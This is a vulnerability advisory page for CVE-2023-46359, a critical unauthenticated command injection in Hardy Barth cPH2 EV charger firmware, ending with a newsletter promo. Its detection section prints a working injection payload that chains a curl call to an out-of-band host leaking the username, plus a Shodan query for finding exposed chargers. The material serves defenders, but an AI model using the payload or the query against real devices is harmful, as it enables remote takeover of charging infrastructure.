cbcvebase.
CVE-2023-46359
published 2024-02-06

CVE-2023-46359: An OS command injection vulnerability in Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute…

PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
80.89%
99.6th percentile
An OS command injection vulnerability in Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.

Affected

1 ranges
VendorProductVersion rangeFixed in
hardy-barthcph2_echarge_firmware<= 1.87.0

Detection & IOCsextracted from sources · hover to see the quote

url/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}
path/connectioncheck.php
command127.0.0.1 && curl http://$(whoami).{{interactsh-url}}
  • Shodan query to identify exposed Hardy Barth cPH2 charging stations: html:"Salia PLCC"
  • Successful exploitation of the connectivity check endpoint returns the string 'SUCCESS' in the HTTP response body, along with the injected payload reflected back.
  • Out-of-band DNS interaction via interactsh confirms RCE; monitor for DNS callbacks from the target device after injecting into the 'ip' parameter of connectioncheck.php.
  • The vulnerability is unauthenticated and exploited via a crafted GET request to /connectioncheck.php with a shell-metacharacter-injected 'ip' parameter (e.g., '&&' chaining).
  • ·Affected versions are Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier; the vulnerability is fixed in version 2.0.0.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.